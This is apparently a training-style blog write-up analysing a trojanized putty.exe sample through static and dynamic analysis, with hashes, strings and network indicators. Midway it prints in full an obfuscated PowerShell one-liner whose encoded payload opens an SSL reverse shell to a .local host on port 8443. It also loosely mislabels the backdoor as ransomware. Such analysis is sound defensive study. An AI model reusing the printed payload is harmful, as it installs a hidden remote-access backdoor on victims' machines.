Unmasking the Mystery: The Curious Case of the Putty Malware
Static Analysis, Dynamic Analysis & Reverse Engineering of Putty Malware
In the vast digital wilderness, malicious software like Putty.exe often hides in plain sight. With file hashes and VT analysis, we aim to expose the malware's nefarious intentions. So, put on your virtual trench coat, and let's decode this binary enigma.
File Hash & VT Analysis: Unveiling the Bad Boys
Our journey begins with a cryptic file hash: 0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83 *putty.exe. According to VirusTotal (VT) analysis, it scores a disconcerting 58/71 in the infected department. It's clear; this is no ordinary binary.
Architecture:
Our malware is a 32-bit binary, lurking in the shadows of the digital realm. But what does it hide beneath the surface? Let's dig deeper.
Basic Static Analysis: Strings, Secrets, and Path-etic Discoveries
The binary doesn't give up its secrets easily. Strings and clues are hidden within, requiring us to employ creative techniques. Whether it's using the FLOSS command or a good old grep, we're determined to unearth the hidden messages within Putty.exe.
Strings & FLOSS Output:
Hidden within the binary, we discover strings that pique our interest. Among them, is a PowerShell one-liner payload encoded in base64.
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
There's a twist—it's compressed with gzip. Our journey takes an unexpected turn.
After analyzing further we found the payload is invoking a reverse shell in the target and it is using an SSL certificate with the host bonus2.corporatebonusapplication.local
IAT & PE View:
We investigate further, dissecting the Import Address Table (IAT) and the Portable Executable (PE) view. It seems like Windows API calls are in play, but with the malware masquerading as the legitimate Putty binary, certainty remains elusive.
Basic Dynamic Analysis: The Plot Thickens
As we delve into dynamic analysis, we uncover the malware's initial detonation. A PowerShell window quietly opens in the background while the Putty interface appears as a decoy. Deception is at the heart of this operation.
Network Signatures:
Our digital detective work leads us to a significant discovery—a DNS record pointing to "bonus2.corporatebonusapplication.local." Could this be the key to the ransomware's operation?
On further analysis, I found out it is making a TCP call back on port 8443 looks. Looks like the reverse shell is calling back at port 8443.
Host Indicators:
Following the trail, we identify a PowerShell-based payload spawned as a child process.
By monitoring the Parent PID and employing tools like ProcMon, we get closer to the heart of the matter.
We can confirm the callback port with tcpview.
Now that we know the binary is making a callback on the host bonus2.corporatebonusapplication.local on port 8443 we can edit the /etc/host file and get a reverse shell that will prove our theory.
After configuring the hosts file and configuring a listener I ran the binary again and got a connection.
I was seeing the garbage data because the reverse shell is using an SSL certificate and we don't have a valid SSL certificate. But indeed it is proved it is a putty reverse shell backdoor RAT.
Summary
In the realm of cybersecurity, analyzing malware is like solving a puzzle, and the Putty Ransomware is one perplexing piece. The article takes you on a thrilling journey of dissecting this malicious binary. We uncover hidden strings, decode mysterious payloads, and unveil a chilling conspiracy involving a reverse shell. The hunt for clues leads us to the infamous host, "bonus2.corporatebonusapplication.local." The article reveals how persistence and clever tricks are used to make it all happen, making it a must-read for aspiring cyber sleuths.
Conclusion
So, there you have it, our exhilarating journey through the enigmatic Putty Ransomware. This tale of malware analysis showcases the incredible detective work that goes into understanding and combating cyber threats. Remember, in the ever-evolving world of cybersecurity, staying curious and vigilant is the key to keeping our digital lives safe from such sinister plots. Stay tuned for more exciting adventures in the world of cybersecurity!